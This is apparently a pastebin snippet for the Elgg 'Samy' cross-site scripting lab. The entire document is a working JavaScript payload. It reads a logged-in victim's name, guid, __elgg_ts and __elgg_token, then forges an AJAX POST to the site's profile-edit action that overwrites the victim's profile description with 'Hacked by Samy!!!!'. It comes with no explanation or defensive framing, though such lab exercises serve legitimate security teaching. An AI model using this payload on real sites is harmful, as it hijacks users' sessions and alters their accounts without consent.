Untitled

mail@pastecode.io avatar
unknown
javascript
6 months ago
1.0 kB
1
Indexable
Never
<script type="text/javascript">
window.onload = function(){
    //JavaScript code to access user name, user guid, Time Stamp __elgg_ts
    //and Security Token __elgg_token
    var userName="&name="+elgg.session.user.name;
    var guid="&guid="+elgg.session.user.guid;
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;
    
    var description="&description=Hacked by Samy!!!!";
    
    var content=token + ts + userName + description + guid;

    var samyGuid=47;

    var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
    
    if(elgg.session.user.guid!=samyGuid)
    {
        //Create and send Ajax request to modify profile
        var Ajax=null;
        Ajax=new XMLHttpRequest();
        Ajax.open("POST",sendurl,true);
        Ajax.setRequestHeader("Host","www.xsslabelgg.com");
        Ajax.setRequestHeader("Content-Type", 
                              "application/x-www-form-urlencoded");
        Ajax.send(content);
    }
}
</script>